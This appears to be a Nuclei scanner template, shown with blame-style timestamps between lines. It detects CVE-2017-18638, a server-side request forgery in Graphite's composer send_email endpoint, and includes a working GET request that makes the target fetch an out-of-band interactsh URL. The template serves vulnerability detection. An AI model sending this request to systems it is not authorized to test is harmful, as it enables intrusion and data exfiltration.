2021-09-03 08:22:53 +00:00
id : CVE-2017-18638
info :
2022-06-19 15:18:24 +00:00
name : Graphite <=1.1.5 - Server-Side Request Forgery
2021-09-03 08:22:53 +00:00
author : huowuzhao
severity : high
2022-06-20 16:07:53 +00:00
description : |
Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
2021-09-03 08:22:53 +00:00
reference :
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
2023-07-11 19:49:27 +00:00
- https://github.com/graphite-project/graphite-web/pull/2499
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-18638
cwe-id : CWE-918
2023-07-15 16:29:17 +00:00
epss-score : 0.00902
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : graphite_project
product : graphite
tags : cve,cve2017,graphite,ssrf,oast
2021-09-03 08:22:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-03 08:22:53 +00:00
- method : GET
path :
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
matchers :
- type : word
part : interactsh_protocol
words :
- "http"